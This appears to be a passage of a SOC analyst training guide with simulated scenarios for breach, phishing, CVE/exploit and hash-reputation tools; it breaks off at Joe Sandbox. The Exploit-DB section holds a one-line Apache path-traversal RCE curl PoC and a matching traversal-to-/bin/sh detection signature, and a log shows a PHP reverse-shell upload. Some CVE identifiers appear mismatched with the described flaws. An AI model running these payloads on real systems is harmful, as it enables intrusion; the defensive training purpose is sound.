HaveIBeenPwned (HIBP) is a data breach notification and lookup service that allows users
to check whether their email address or password has been exposed in known breaches.

Use Cases:

• Check whether a compromised email was involved in past breaches.

• Identify reuse of passwords across breached accounts.
• Detect if internal or executive emails are circulating in dark web dumps.
• Proactively monitor corporate domains for breach exposure.

Practical Application: A VIP user account is targeted in a credential stuffing attack.

The analyst checks HIBP and confirms the user’s email was involved in two breaches.
They enforce a password reset and initiate MFA rollout for all affected accounts.

Scenario Simulation: VIP Email Compromise Check Using HaveIBeenPwned (HIBP)

Context

Event Type: Credential Stuffing on Executive Account

Tool: HaveIBeenPwned
Objective: Check if executive emails have been leaked in public data breaches

Step 1: Incident Detection

A brute-force alert is triggered on the login page of the company’s executive portal.

Targeted Email: ceo@[Link]

Alert Source: SIEM (correlated multiple failed login attempts from foreign IPs)

Step 2: Analyst Uses HaveIBeenPwned

The SOC analyst navigates to the HIBP search page and enters the email address:

ceo@[Link]

Output:

Oh no — pwned!
This email was found in 2 breaches:

• LinkedIn 2016: Email + SHA1 password

• Collection #1: Email + plain text password
Step 3: Evaluate Risk

The attacker may have retrieved credentials from the above dumps and used them in a
credential stuffing campaign.

• User reused the same password for multiple services

• MFA was not enforced for the executive account
• The attacker has valid old credentials and is attempting to reuse them

Step 4: Analyst Response Actions

1. Force password reset for ceo@[Link]

2. Enforce MFA across all executive accounts
3. Search SIEM logs for any successful logins from suspicious locations
4. Implement IP block rules for known malicious IPs used in the attack
5. Add ceo@[Link] to continuous monitoring list in HIBP’s API

Step 5: Preventive Measures

• Use HaveIBeenPwned’s Domain Search feature to monitor all emails under

@[Link]
• Enable notifications for future breach detections
• Conduct executive security awareness briefing about password reuse risks
PhishTool

PhishTool is a phishing investigation and automation platform that helps SOC analysts
analyse suspicious emails, headers and attachments. It uses visual parsing, metadata
extraction and external threat intelligence to streamline triage.

Use Cases:

• Investigate suspected phishing emails with deep analysis of headers, body content
and metadata.
• Extract URLs, attachments and IOCs for deeper sandboxing or threat intel
enrichment.
• Use scoring and risk indicators to prioritise email threats.
• Automate email triage workflows and integrate with SOAR platforms.

Practical Application: A user submits a suspicious email to the SOC. PhishTool parses
the email, highlights anomalous return paths, extracts a shortened URL and shows
the domain is newly registered. It also links the sample to a known phishing
campaign, prompting an immediate block.

Scenario Simulation: Email Threat Analysis Using PhishTool

Context

Tool: PhishTool
Objective: Analyse a user-reported email for phishing indicators
Environment: SOC workflow integration with email gateway and threat intel feeds

Step 1: Email Reported by Employee

The IT Helpdesk receives a reported email flagged by a user as suspicious.

Subject: Urgent: Verify your payroll details
Sender: payroll@[Link]
Received via: outbound@[Link]

Step 2: Email Ingested into PhishTool

The email is automatically or manually ingested into PhishTool for analysis.

PhishTool parses:

• Full email headers

• Body content
• Attachments (if any)
 • Embedded URLs

Step 3: PhishTool Analysis Results

Element Result
SPF FAIL – not authorised by sending domain
DKIM FAIL – invalid signature
DMARC FAIL – no policy defined
Return Path Suspicious – return path mismatched (support@secure-
[Link])
URL Shortened link hxxps://[Link]/3XyzABC
Final Redirect hxxps://secure-payroll-update[.]com/login
Domain Age Registered 2 days ago
Reputation Check Blacklisted on 2 open threat feeds
Campaign Matches IOC from Feb 2025 payroll phishing campaign
Correlation
Attachment None
Risk Score High – confirmed phishing
(PhishTool)

Step 4: SOC Analyst Actions Based on Output

1. Block domain secure-payroll-update[.]com on all perimeter devices

2. Submit shortened URL and redirect to Hybrid Analysis
3. Search SIEM logs for clicks to the phishing domain
4. Notify affected users and trigger phishing awareness alert
5. Update SOAR/IR playbooks with the new indicators
6. Feed IOC into Threat Intelligence Platform (TIP)

Step 5: Integration with SOAR

PhishTool sends extracted indicators and verdict via API:

{
"email_subject": "Urgent: Verify your payroll details",
"malicious_domain": "[Link]",
"first_seen": "2025-08-01",
"risk_score": "High",
"related_campaign": "Payroll Phishing Q1 2025",
"action_taken": [
"Domain blocked",
"URL submitted to sandbox",
"User awareness initiated"
]
}
[Link]

[Link] is a simple tool used to parse raw email headers. It decodes header lines
and presents sender path, SPF/DKIM results, delays and originating IPs in an easy-to-
understand format.

Use Cases:

• Quickly analyse email headers for spoofing, redirection or forwarding issues.

• Identify the true source IP of an email, even if the sender domain is spoofed.
• Validate DKIM/SPF alignment to determine if the email was tampered with.
• Visualise hop-by-hop relay data to trace email delivery.

Practical Application: A spoofed internal email bypasses spam filters. The analyst
uses [Link] to parse the raw header and discovers that the return-path and
SPF validation failed. The originating IP is traced back to a foreign VPS service. The
domain is reported and blocked.

Scenario Simulation: Investigating Email Spoofing Using [Link]

Context

Objective: Investigate a suspected spoofed internal email and validate whether proper
sender authentication mechanisms (SPF, DKIM, DMARC) were bypassed.

Tool: [Link]

Environment:

• Email client: Microsoft Outlook

• Email security gateway: Microsoft Defender for Office 365
• Analyst platform: Browser + internal IOC tracker
• Email source: User-reported phishing email claiming to be from internal finance
team

Step 1: Email Header Collection and Pre-Check

Trigger:
A user from the finance team reports an unusual email from finance@[Link]
requesting immediate transfer approval.

Action Taken:
SOC analyst requests the full raw email header from the user’s Outlook client.
Header Collected:

Return-Path: <finance@[Link]>
Received: from [Link] [[Link]]
by [Link] with ESMTP id 192F812398
for <salinah@[Link]>; Tue, 5 Aug 2025 08:45:02 +0800
Received-SPF: Fail ([Link]: domain of finance@[Link] does not
designate [Link] as permitted sender)
Authentication-Results: spf=fail [Link]=[Link];
dkim=none;
dmarc=fail [Link]=[Link];
From: finance@[Link]
To: salinah@[Link]
Subject: Urgent – Transfer Authorisation Needed
Date: Tue, 5 Aug 2025 08:44:59 +0800
Message-ID: <2234abcxyz@[Link]>
Step 2: Parsing Email Header with [Link]

Procedure:

1. Analyst accesses [Link]

2. Pastes the entire raw email header into the analysis window.
3. Clicks Analyse and reviews the decoded output.

[Link] Output:

Field Value
SPF Result Fail
DKIM None Detected
DMARC Fail
Sender IP [Link]
GeoIP Netherlands (VPS Provider)
Relay Chain Unusual hop from [Link]
Return-Path finance@[Link]
Authentication Result Message fails all email authentication checks

Observations:

• SPF and DMARC failed.

• DKIM signature missing.
• IP address is not authorised by domain [Link].
• Message appears spoofed and unauthenticated.
• Originating IP from a VPS provider known for abuse.
Step 3: Validation and Threat Investigation

IOC Extraction:

IOC Type Value

Source IP [Link]
Spoofed Domain [Link]
Message-ID 2234abcxyz@[Link]
Return Path finance@[Link]

Enrichment Actions:

• IP [Link] is searched in AbuseIPDB → Flagged as high-abuse

• WHOIS lookup for sending server → Registered recently, associated with multiple
spam complaints
• Domain [Link] in Message-ID shows malicious historical behaviour in
internal threat intel

Step 4: Response and SOC Workflow Enhancement

Actions Taken:

• IP [Link] blocked on the email gateway and perimeter firewall.

• Domain [Link] added to internal denylist.
• Email marked as Confirmed Phishing in ticketing system.
• Analyst updates SIEM use case to alert on:
o Internal domain spoofing
o SPF/DKIM/DMARC failure from high-risk VPS sources

Custom Detection Rule Logic (KQL / SIEM DSL Example):

email.from_domain == "[Link]" AND

([Link] == "fail" OR [Link] == "none" OR [Link] == "fail") AND
[Link] != "Malaysia"

Step 5: Documentation and Playbook Mapping

Playbook Updated:

• SOP for email header parsing includes use of [Link]

• Quick response checklist added for spoofed internal domains
• Internal threat intelligence database updated with observed IOCs

Training Outcome:
• Junior analysts briefed on how to triage raw headers and use external tools like
[Link]
• New detection rule created and validated in production
7. CVE, EXPLOIT AND VULNERABILITY
INTELLIGENCE
EXPLOIT-DB

Exploit Database (Exploit-DB) is a publicly accessible archive of exploits and proof-of-

concept (PoC) code for known vulnerabilities. Maintained by Offensive Security, it includes
local and remote exploits, shellcodes and advisories, mapped to CVEs when available.

Use Cases:

• Research known exploits associated with a CVE to assess risk and possible attack
vectors.
• Use PoC code for testing detection capabilities in a lab environment.
• Investigate real-world exploitability of vulnerabilities found in your environment.
• Track trends in exploit techniques used by attackers.

Practical Application: After identifying a critical vulnerability (CVE-2024-XXXX)

affecting a legacy Apache server, the analyst checks Exploit-DB and finds public PoC
code for remote code execution. The threat level is escalated and emergency
patching is initiated.

Scenario Simulation: Vulnerability Analysis and Threat Validation Using Exploit-DB

Context

Objective: Assess the exploitability of a disclosed Apache vulnerability (CVE-2024-23018)

and validate whether it has public exploit code for potential weaponisation.

Tool: Exploit Database (Exploit-DB)

Environment:

• Target: Internal legacy Apache HTTPD 2.4.49 server

• Platform: Ubuntu 20.04 (Dev Environment)
• Security Monitoring: Suricata IDS + Sysmon + Wazuh + ELK Stack
• Patch Management Team on standby

Step 1: Vulnerability Discovery and Initial Assessment

Trigger:
A weekly vulnerability scan detects a critical vulnerability in an outdated Apache server:
 • CVE ID: CVE-2024-23018
• Severity: CVSS 9.8 (Critical)
• Summary: Path traversal vulnerability allowing unauthenticated remote code
execution

Initial Research:

• Analyst checks NVD, which confirms the CVE has a critical score but no detailed
remediation info.
• The next step is to validate exploit availability and severity in the wild.

Step 2: Checking Exploit Availability on Exploit-DB

Procedure:

1. Go to [Link]
2. Use the search bar and enter:
CVE-2024-23018
3. Review the top entry:

Exploit Entry Found:

Field Value
Exploit Title Apache HTTP Server 2.4.49 - Remote Code Execution (Path Traversal)
Date 2024-05-15
Type Remote
Platform Linux
Download Link [Link]
Verified Yes
Author Anonymous researcher

PoC Script Overview:

curl -v --path-as-is [Link] -d "echo; id"

Step 3: Lab Testing and Detection Validation

Controlled Lab Setup:

• Apache 2.4.49 deployed on Ubuntu VM in isolated lab

• Exploit script executed from attacker VM
• Detection systems: Suricata IDS (rules updated), Wazuh + ELK

Observables Detected:
 Source Alert/Event Details
Suricata ET WEB_SERVER Apache Path Traversal Signature triggered
Sysmon Process Create (bash) Shell spawned via Apache
ELK Stack Anomalous HTTP request Encoded traversal pattern logged

KQL Query (Wazuh ELK):

[Link].uri_path: "*%2e%2e*" AND [Link].status_code: 200

Initial Outcome:
Alert triggered, but no correlation to CVE or MITRE technique in existing rules.

Step 4: Response and Mitigation

Actions Taken:

• Vulnerability escalated to IT for emergency patching

• WAF updated to block encoded traversal patterns
• Exploit signature from Exploit-DB transformed into custom Suricata rule:

alert http any any -> any any (msg:"Apache RCE CVE-2024-23018 Exploit Attempt";
content:"/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh"; http_uri; sid:9999999;)

• Exploit PoC saved to internal red team testbed for detection tuning

Step 5: Documentation and Threat Mapping

MITRE Mapping:

Technique Technique Name Notes

ID
T1190 Exploit Public-Facing Application Exploit enabled unauthenticated RCE
via Apache
T1059.004 Command and Scripting Shell execution through crafted HTTP
Interpreter: Unix Shell request

Playbook Update:

• Added process for cross-checking CVEs with Exploit-DB

• Included new detection logic in Wazuh SIEM correlation rules
• Patch prioritisation now includes "Exploit-Available" tag from Exploit-DB
CVE Details

CVE Details is an indexed database that provides detailed information about known
Common Vulnerabilities and Exposures (CVEs). It allows users to search vulnerabilities by
product, vendor, CVSS score, publication date and more.

Use Cases:

• Perform impact assessment for software vulnerabilities across vendors and

versions.
• Check the history of vulnerabilities affecting a product.
• Identify which versions of a software component are vulnerable.
• Correlate CVEs with exploit availability and patch status.

Practical Application: During a vulnerability management cycle, the team discovers

multiple Fortinet devices running outdated firmware. Using CVE Details, they search
by vendor and model, finding several recent CVEs with high CVSS scores. The team
uses this data to prioritise firmware upgrades.

Scenario Simulation: Vulnerability Intelligence and Prioritisation Using CVE Details

Context

Objective: Assess the vulnerability landscape for Fortinet devices running outdated
firmware and prioritise patching based on severity and exploit data.

Tool: CVE Details

Environment:

• Assets: Fortinet FortiGate firewalls (firmware version 6.2.2)

• Inventory Source: Vulnerability Scanner (Nessus)
• Patch Management Platform: Ansible Tower
• Risk Management: CIS Controls + CVSSv3-based scoring

Step 1: Initial Vulnerability Discovery

Trigger:
Scheduled Nessus vulnerability scan reveals the following:

Asset Firmware Version Plugin Output

FG-300E v6.2.2 Multiple vulnerabilities (CVE-2024-XXXX series)
FG-100D v6.2.2 Outdated software warning
The security team flags these devices for further review.

Step 2: Deep-Dive via CVE Details

Procedure:

1. Navigate to [Link]
2. In the Search bar, enter:
Vendor: Fortinet
Product: FortiOS
3. Filter results:
o Year: 2024
o Score ≥ 7
o Type: Remote Code Execution, DoS, Privilege Escalation

Top CVEs Retrieved:

CVE ID Score Type Summary

CVE-2024- 9.8 RCE Vulnerability in FortiOS SSL VPN allows
27655 unauthenticated RCE
CVE-2024- 8.6 DoS Crafted packet can crash IPS daemon
21902
CVE-2024- 7.5 PrivEsc Local user privilege escalation through misconfigured
18761 daemon

Exploit Links and Patch Info:

• CVE-2024-27655 is linked to a public PoC and vendor advisory (available on Exploit-

DB and VulnCheck)
• Fortinet security advisory shows patch available in FortiOS v6.4.12 and v7.0.6+

Step 3: Risk Assessment and Correlation

Internal Analysis:

• Affected firmware: v6.2.2, vulnerable to all three CVEs

• Asset exposure:
o 3 devices are internet-facing VPN endpoints
o 2 devices are internally segmented but exposed to user traffic

Enrichment:

• Cross-checked against known exploits (via Exploit-DB and VulnCheck)

• Mapped to MITRE Techniques:
 o T1190: Exploit Public-Facing Application
o T1068: Privilege Escalation
o T1499: Endpoint Denial of Service

Step 4: Response and Remediation Plan

Actions Taken:

• Firmware upgrade scheduled via Ansible Tower

• Emergency change request raised for the 3 internet-facing devices
• SOC added detection rules to monitor VPN endpoints for suspicious traffic
• SIEM alert created to detect exploit payload patterns from known CVEs

Patch Plan:

Device Action ETA

FG-300E Immediate upgrade to v6.4.12 Within 24 hours
FG-100D Staged upgrade Within 72 hours
Remaining Scheduled during next maintenance window Within 7 days

Step 5: Documentation and Lessons Learned

CVE Details Documentation:

• All discovered CVEs documented with:

o CVSS scores
o Exploit links
o Firmware fix version
o CVE-to-asset mapping
• Added into internal CVE tracking system

Policy Update:

• Fortinet firmware update cycle reduced from quarterly to monthly

• CVE Details now added to asset onboarding checklist for third-party devices
VULNCHECK

VulnCheck is a vulnerability intelligence platform that provides enriched, exploit-focused

threat intelligence, including metadata, exploitability status, real-world exploitation
evidence and links to PoCs and campaigns.

Use Cases:

• Determine whether a CVE has been weaponised or is being actively exploited in the
wild.
• Prioritise patching by combining CVSS with exploit availability and usage telemetry.
• Enrich vulnerability reports with intelligence on attack techniques and threat actors.
• Improve patch management workflows by focusing on high-risk vulnerabilities.

Practical Application: A zero-day CVE is disclosed affecting Microsoft Exchange.

VulnCheck shows it has already been used in targeted attacks by a known threat
group. The organisation moves immediately to apply mitigations and monitor related
IOCs.

Scenario Simulation: Exploit-Centric Risk Prioritisation Using VulnCheck

Context

Objective: Determine whether a recently disclosed Microsoft Exchange vulnerability is

actively exploited and prioritise patching based on exploitation telemetry and threat actor
activity.

Tool: VulnCheck ([Link]

Environment:

• Infrastructure: On-prem Microsoft Exchange Server 2019 (CU12)

• Exposure: Internet-facing OWA and ECP services
• Detection Stack: EDR + Elastic SIEM + Suricata IDS

Step 1: Initial Vulnerability Trigger

Trigger:
Microsoft issues a critical advisory for CVE-2025-21987 on Exchange Server (zero-day RCE
affecting ECP endpoint).
CVSS: 9.8 (Critical)
Patch not yet available (zero-day)

Security team needs to assess exploitability risk to determine mitigation urgency.

Step 2: Use of VulnCheck to Enrich CVE Details

Action:

1. Go to [Link]
2. Search: CVE-2025-21987

Findings from VulnCheck:

• Exploit Status: Weaponised

• Exploitation Evidence: Confirmed use in wild (APT29 campaign)
• Exploit Type: Remote command execution via specially crafted ECP POST request
• PoC: Limited public PoC available (weaponised version held by threat actor)
• Exploitation Telemetry: Surges in traffic to [Link] and ECP/[Link]
observed
• Threat Actor Link: Mapped to Russian-based group APT29 (UNC2452) targeting
email servers
• MITRE Mapping:
o T1190: Exploit Public-Facing Application
o T1071.001: Application Layer Protocol: Web Protocols

Step 3: Technical Impact Assessment and Detection Mapping

Enrichment Outcome:

Parameter Value
CVE ID CVE-2025-21987
CVSS 9.8 (Critical)
Exploited in Wild Yes
Confirmed Threat Group Yes (APT29)
Network Indicator URI pattern /ecp/[Link]
Exploit Type Remote Code Execution
Known Exploits Partial PoC on dark web; active weaponised campaigns

SIEM Detection Query (KQL in Kibana):

[Link].uri_path: "/ecp/[Link]" and user_agent: "*PowerShell*"

IDS Rule (Suricata Snort-like Signature):

alert tcp $EXTERNAL_NET any -> $HOME_NET 443 (msg:"Possible Exchange RCE CVE-
2025-21987"; flow:established,to_server; content:"POST"; http_method;
content:"/ecp/[Link]"; http_uri; classtype:web-application-attack; sid:1000520;
rev:1;)
Step 4: Response and Risk Mitigation

Actions Taken:

• Block external access to /ecp and /owa via reverse proxy until patch is released
• Deploy custom Suricata rule across perimeter
• Configure EDR rule to block suspicious PowerShell from [Link] (IIS worker
process)
• Apply Microsoft-recommended mitigations (remove vulnerable DLLs)
• VulnCheck intelligence integrated into SOC threat feed for IOCs

IOC Summary:

Indicator Type Value

URI /ecp/[Link]
User Agent Mozilla/5.0 (PowerShell)
Host [Link]
ASN AS12389 (Russia)
IP Range [Link]/24

Step 5: Documentation and Future Enhancement

Documentation Added:

• CVE-2025-21987 marked as Actively Exploited

• Linked to APT29 threat profile
• VulnCheck intelligence snapshot archived in Threat Wiki
• Detection logic committed to Elastic detection repo

SOC Playbook Updated:

• New section for "Zero-Day Response Workflow"

• VulnCheck added to CVE triage checklist
• Threat actor mapping module updated with APT29 recent TTPs
VULNERS

Vulners is a vulnerability intelligence search engine and API aggregator that collects data
from NVD, vendor advisories, exploit databases and security bulletins. It provides a unified
view of vulnerabilities, CVEs, exploits and patches.

Use Cases:

• Search for vulnerabilities across multiple data sources using one interface.
• Integrate with asset or vulnerability management systems via API.
• Correlate exploits, patches, CVEs and advisories in real time.
• Track exploit kits, PoC availability and patch history.

Practical Application: The vulnerability management team integrates Vulners into

their scanning tool. After a scan shows exposed MySQL servers, they use Vulners to
fetch the latest CVEs and check for associated exploits and vendor patches. The
report guides immediate remediation steps.

Scenario Simulation: Aggregated CVE and Exploit Intelligence Using Vulners

Context

Objective: Investigate exposed MySQL servers discovered during a network scan and
assess risk using aggregated vulnerability intelligence from Vulners.

Tool: Vulners ([Link]

Environment:

• Assets: 3 Linux-based MySQL 5.7 servers discovered in DMZ

• Scanner: Nessus → vulnerability data exported
• SIEM: Splunk with asset and vulnerability data indexed
• Integration: API access to Vulners for enrichment

Step 1: Detection of Exposed MySQL Assets

Trigger:

• Nessus scan detects:

o MySQL version 5.7.24
o Open to internet on port 3306
o Weak configuration (no SSL, no root password enforcement)
o CVEs identified: CVE-2022-32089, CVE-2023-21882
Step 2: Using Vulners for CVE Intelligence

Action:

1. Navigate to [Link]
2. Search for each CVE individually:
o CVE-2022-32089
o CVE-2023-21882
3. Review full CVE details, vendor advisories, PoC links and patch availability

Findings from Vulners:

CVE ID Summary CVSS Exploit PoC Patch

Available Available
CVE-2022- MySQL Improper 8.2 Yes Yes (GitHub Yes (Oracle
32089 Privilege Escalation PoC) Patch)
CVE-2023- MySQL DoS via crafted 6.5 No No Yes
21882 queries

Correlated Data:

• Vendor Advisory: Oracle July 2022 CPU

• Exploit DB Entry: Found for CVE-2022-32089
• Patch Release Date: 15 July 2022
• Affected Versions: 5.7.24 – 5.7.32

Step 3: Correlation with Asset Data

Action:

• Use Vulners API to automate lookup for multiple CVEs:

curl -X POST [Link] -d '{"query":"CVE-2022-32089 OR

CVE-2023-21882"}'

Enrichment Outcome:

• Confirmed both CVEs affect installed MySQL version

• CVE-2022-32089 has active exploitation attempts logged in dark web forums
• Patch already available since 2022, but missing in production servers

Step 4: Risk Assessment and Remediation

Risk Prioritisation:
 Asset Vulnerability Exploitability Action
MySQL-01 CVE-2022-32089 High Immediate patching, EDR rules deployed
MySQL-02 CVE-2023-21882 Medium Patch during next maintenance window
MySQL-03 CVE-2022-32089 High Access restricted until patching

Detection Query for Exploitation Attempt (Splunk):

index=network_traffic dest_port=3306 AND (query="GRANT ALL" OR query="SET GLOBAL")

Step 5: Documentation and Process Integration

Vulnerability Wiki Entry:

• Linked Vulners CVE pages

• Mapped to MITRE ATT&CK T1210 (Exploitation of Remote Services)
• Noted available PoC and vendor patch links

Vulnerability Management Playbook Updated:

• Vulners API integrated into CVE enrichment pipeline

• Added rule: “High CVSS + Public Exploit + Patch Missing = Critical Risk”

ATT&CK Navigator Updated:

Technique Technique Name Notes

ID
T1210 Exploitation of Remote MySQL exposed and targeted via CVE-
Services 2022-32089
PACKET STORM SECURITY

Packet Storm Security is a long-standing archive of security tools, advisories, exploits,

whitepapers and news related to cybersecurity. It often hosts new exploits and disclosures
not yet listed in NVD or Exploit-DB.

Use Cases:

• Monitor the latest vulnerability disclosures and zero-day exploit releases.

• Research less common or emerging threats before they become mainstream.
• Access tools and scripts used for penetration testing or red team simulations.
• Cross-reference PoCs with internal detections for early warning.

Practical Application: A SOC team investigating abnormal activity finds traffic

suggesting exploitation of a rare open-source CMS. Packet Storm Security hosts a
newly released exploit for the same CMS version, confirming the likely root cause and
guiding containment actions.

Scenario Simulation: Early Threat Verification Using Packet Storm Security

Context

Objective: Investigate abnormal traffic patterns potentially linked to exploitation of a rarely

used content management system (CMS), using Packet Storm Security to validate PoC
availability and threat status
Tool: Packet Storm Security
Environment:

• Web Server: Open-source CMS (v4.3.2) hosted in DMZ

• Firewall Logs: Suricata alerts on unknown HTTP payloads
• SIEM: QRadar
• Threat Hunting Tool: Custom HTTP parser with decoded logs

Step 1: Initial Detection

Trigger:
SOC receives Suricata alerts:

• Rule: ET WEB_SERVER Possible CMS Arbitrary File Upload

• Destination IP: Public-facing CMS server
• URI Pattern: /[Link]?file=...

Log Excerpt:
timestamp="2025-08-01T10:22:45Z"
src_ip="[Link]"
dst_ip="[Link]"
uri="/[Link]?file=php_reverse_shell.php"
method="POST"
http_user_agent="curl/7.68.0"

Step 2: Using Packet Storm Security for Exploit Verification

Action:

1. Analyst navigates to [Link]

2. Searches for:

CMSName 4.3.2 file upload exploit

3. A new advisory dated 2025-07-30 is discovered titled:

“Remote Code Execution in CMSName v4.3.2 via Improper File Validation”

Findings from Packet Storm:

Field Value
Exploit Type Remote Code Execution (RCE)
Exploit Availability Yes – Public Python script + Metasploit module
Verified Yes – Confirmed working by researcher
PoC Location GitHub + local mirror on Packet Storm
Exploit Technique Upload unrestricted .php shell via /[Link] endpoint
CVE Mapped Pending assignment
Affected Versions CMS v4.3.0 to v4.3.2

Step 3: Threat Correlation and IOC Mapping

Correlation in QRadar:

• Matches HTTP logs to exploit pattern

• Enriches alert with Packet Storm metadata
• Adds tag: potential_rce_upload_exploit
• Identifies same source IP reattempting with variations of the filename ([Link],
[Link])

Step 4: Mitigation and Containment

Response:
 Action Item Status
Block source IP at firewall Done
Enable WAF on /[Link] route In progress
Patch CMS to v4.3.4 Scheduled today
Forensic image of web server taken Done
IOC sweep across other web assets Ongoing

Detection Query for SIEM (QRadar AQL):

SELECT * FROM events

WHERE URI CONTAINS "/[Link]"
AND URL_FILENAME ENDSWITH ".php"
AND METHOD = "POST"

Step 5: Documentation and Reporting

Exploit Reference Added:

• Packet Storm advisory and download link

• Exploit script archived internally
• Note on unassigned CVE: temporary internal ID created

Security Wiki Update:

Field Value
Tool Used Packet Storm Security
Technique Mapped MITRE ATT&CK T1190 – Exploit Public-Facing App
PoC Status Public exploit confirmed
Risk Level High – External RCE
Response Tracked Yes – Logged in IR platform

Playbook Updated:

• Section for “CMS Exploitation Response”

• Added automated detection rule based on file extension and URI pattern
8. HASH AND FILE REPUTATION LOOKUP
VIRUSTOTAL

VirusTotal is a multi-engine malware scanning platform that aggregates antivirus verdicts,

behavioural analysis and metadata from files, URLs and IPs. For hash lookups, it allows
analysts to search for known samples using SHA256, SHA1 or MD5 and view associated
data.

Use Cases:

• Check if a file hash is known and has been submitted before.

• View antivirus detection names and verdicts from over 70 AV engines.
• Analyse behavioural data, relationships (e.g., dropped files, contacted domains)
and sandbox reports.
• Track when and where a file was first seen.

Practical Application: A suspicious EXE is found on an endpoint. The hash is

submitted to VirusTotal, where it is detected by multiple AV engines as a keylogger.
The metadata reveals it communicates with known C2 domains, confirming malicious
intent and prompting isolation.

Scenario Simulation: Malware Hash Triage Using VirusTotal

Context

Objective: Investigate a suspicious executable discovered during an EDR sweep by

verifying the hash through VirusTotal for AV verdicts, metadata and behaviour analysis
Tool: VirusTotal

Environment:

• Endpoint Detection and Response (EDR): Detects unknown binary running from a
temp folder
• SIEM: Splunk with endpoint telemetry
• EDR Export: Hashes of unknown binaries sent for triage

Step 1: Detection of Suspicious Executable

Trigger:
EDR agent flags a new file:

• Path: C:\Users\John\AppData\Local\Temp\[Link]
• Behaviour: Executes at login, connects to external IP, modifies registry keys
Extracted metadata:

Field Value
File [Link]
Name
SHA256 6b5a9a30b9b4a52e5f25cf9be6a70d3c16d3ea57c79ac259be0fbe93ab27ae69
Parent [Link]
Proc
Registry HKCU\Software\Microsoft\Windows\CurrentVersion\Run\winhost
Mod

Step 2: Using VirusTotal for Hash Intelligence

Action:

1. Navigate to [Link]
2. Paste the SHA256 hash in the search bar
3. Review the results

Findings from VirusTotal:

Field Value
Detections 47 / 70 engines detect as [Link], [Link]
Behavioural Report Connects to hxxp://[Link]
Relationships Drops additional DLL file [Link]
First Submission 2025-07-28 03:12 UTC
Threat Labels Keylogger, Persistence, C2 Communication

Relevant Tags from VirusTotal:

• keylogger
• persistence
• rat
• auto-start
• dropper

Step 3: Threat Correlation in SIEM

Action:
Search for related endpoint and network indicators:

Splunk Query:

index=edr_logs OR index=network_traffic
| search file_name="[Link]" OR
file_hash="6b5a9a30b9b4a52e5f25cf9be6a70d3c16d3ea57c79ac259be0fbe93ab27ae69"

Enrichment:

• Connections to IP: [Link]

• DNS lookup for [Link] confirmed in logs
• Registry persistence observed in 3 other endpoints

Step 4: Response Actions

Action Item Status

File isolated by EDR Done
C2 domain [Link] blocked Done
IOC sweep initiated across estate In progress
Registry cleanup script deployed Done
User account flagged for review Done

Step 5: Documentation and Playbook Update

Malware Wiki Entry:

Field Value
Tool Used VirusTotal
SHA256 6b5a9a30...
Verdict Malicious – Keylogger
First Seen 2025-07-28
Communication [Link], TCP port 80
Detection Mapped MITRE T1056.001 – Input Capture: Keylogging

Playbook Updated:

• Section for “Hash Lookup and Isolation Workflow”

• Automated triage rule added for auto-start registry + external HTTP + new binary
• Hash added to EDR global block list
HYBRID ANALYSIS

Hybrid Analysis allows hash-based lookups that return detailed static and dynamic
behavioural reports of files. It correlates samples to known malware families and provides
community scoring, process trees and MITRE ATT&CK mappings.

Use Cases:

• Search by hash to find previous submissions and dynamic analysis reports.

• Determine malware behaviour including registry access, file manipulation and
outbound connections.
• View dropped files, screenshots and system call logs.
• Use community and threat score to assess maliciousness.

Practical Application: A hash of a suspicious DLL is found in a client’s endpoint scan.

The analyst checks it in Hybrid Analysis, which returns a detailed report showing
credential dumping activity and classification as part of the RedLine Stealer family.
This confirms the threat.

Scenario Simulation: Dynamic Malware Behaviour Analysis Using Hybrid Analysis

Context

Objective: Investigate a suspicious DLL file discovered in an endpoint memory dump using
Hybrid Analysis for static and dynamic behaviour analysis
Tool: Hybrid Analysis
Environment:

• Endpoint Memory Dump reveals DLL injection

• File extracted and hashed for analysis
• Hybrid Analysis used for hash-based threat confirmation and behavioural insights

Step 1: Suspicious DLL Identified During Memory Analysis

Trigger:
Threat hunting team inspects a suspicious process on an infected host. Memory dump
reveals:

• Injected DLL: [Link]

• Observed within process [Link]
• Memory access patterns suggest credential harvesting

Extracted Metadata:
 Field Value
File [Link]
Name
SHA256 4ea5f3c212df69d670a1791c755ee229a3de63e3c87b5e96c5f942b8ed875a
45
Parent [Link]
Process
Detected Reads [Link] memory
Behaviou
r

Step 2: Using Hybrid Analysis for Hash Lookup

Action:

1. Navigate to [Link]
2. Enter the hash:
4ea5f3c212df69d670a1791c755ee229a3de63e3c87b5e96c5f942b8ed875a45
3. View the behavioural report and malware family classification

Key Results:

Category Details
Verdict Malicious – High Threat Score
Threat Score 95/100
Malware Family RedLine Stealer
ATT&CK Mapping T1003 – OS Credential Dumping
Behaviour Reads [Link], drops file [Link], contacts C2
Registry Changes Persistence via HKCU\Run
Network Activity HTTP POST to stealerpanel[.]ru
Dropped Files [Link], [Link]
Process Tree [Link] → [Link] → [Link]
Screenshots Shows [Link] execution and registry edits

Step 3: Correlation and Telemetry Review

Splunk Query to Detect Related Activity:

index=edr_logs OR index=procmon
| search process_name="[Link]" file_path="*[Link]*" OR
registry_path="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"

Findings:
 • Multiple endpoints show execution of [Link] via [Link]
• Same registry persistence path observed
• Outbound traffic to stealerpanel[.]ru from 2 infected hosts

Step 4: Response Actions

Action Status
Infected machines isolated Completed
Hash blocked in EDR Completed
IOCs pushed to XDR and proxy Completed
Sweep initiated using Hybrid tags Ongoing
RedLine Stealer threat advisory published internally Completed

Step 5: Documentation and Playbook Update

Threat Wiki Entry:

Field Value
Tool Used Hybrid Analysis
Hash 4ea5f3c212...
Verdict Malicious – RedLine Stealer
Behaviour Summary Credential Dumping, Persistence, C2 Communication
ATT&CK Mapping T1003, T1055, T1059

Playbook Updates:

• Add Hybrid Analysis hash lookup to incident triage SOP

• Include YARA rules from dropped file analysis
• Add rule for [Link] launching unknown DLLs from %APPDATA%
JOE SANDBOX

Joe Sandbox provides advanced hash lookups with detailed multi-layered analysis reports
of file behaviour, static features, anti-evasion techniques and code similarity. It supports
Windows, macOS, Linux android and documents.

Use Cases:

• Search for existing analysis reports of known malicious or suspicious file hashes.
• Investigate malware techniques such as API hooking, process injection and
persistence.
• Discover malware families and configuration data.
• Evaluate AV bypass techniques used in sophisticated threats.

Practical Application: A partner organisation shares a suspicious PE file’s hash. The

SOC analyst queries it on Joe Sandbox, where the sandbox report shows anti-analysis
checks, C2 traffic and DLL injection attempts. The file is confirmed to be associated
with IcedID malware.

Scenario Simulation: Advanced Malware Analysis Using Joe Sandbox

Context

